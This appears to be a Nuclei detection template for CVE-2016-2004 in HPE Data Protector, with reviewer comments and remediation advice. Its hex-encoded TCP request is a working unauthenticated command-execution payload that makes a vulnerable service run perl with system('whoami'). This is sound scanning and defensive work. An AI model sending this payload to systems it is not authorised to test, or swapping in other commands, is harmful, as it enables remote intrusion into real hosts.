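# Nuclei network template: detects CVE-2016-2004 in HPE Data Protector by
# sending one unauthenticated request to the service port and checking the
# reply. This is an active check: the request makes a vulnerable service run
# `whoami`, so a match means a command was executed on the scanned host.
id: CVE-2016-2004

info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  # The exploit-db entry was listed twice (with and without a trailing
  # slash); it is kept once.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  # The fixed versions are the ones named in the description. The flaw is
  # missing authentication (CWE-306), so until a host is upgraded, limiting
  # which systems can reach the service port (5555 below) reduces exposure.
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
    epss-score: 0.06793
  metadata:
    max-request: 1
    product: data_protector
    vendor: hp
  tags: cve,cve2016,network,iot,hp,rce,edb

tcp:
  - host:
      - "{{Hostname}}"
    # Only this port is probed; a service moved to another port is not
    # checked.
    port: 5555

    inputs:
      # Fixed request bytes, sent as-is after hex decoding. The probe is
      # constant, so scans with this template produce the same bytes on the
      # wire every time.
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900"  # whoami
        type: hex

    matchers:
      # Literal hex match on one complete reply: the UTF-16LE text
      # "nt authority\system" with its framing bytes. A vulnerable service
      # running under any other account answers with different bytes and is
      # not flagged, so a non-match does not show that a host is patched.
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000"  # authority\system
# NOTE(review): the digest below was issued for the template as published;
# the comments and the reference clean-up in this copy presumably invalidate
# it, so re-sign before relying on signature verification.
# digest: 4a0a00473045022100d1c4b3e971e6f77aa7031cfdcdf219aa85600a009a9cd878f13198c648ad9ddc02204f5a98b0810b137632fada20007624adc5b433fa0ba1f593ee07faa8de914f70:922c64590222798bb761d5b6d8e72950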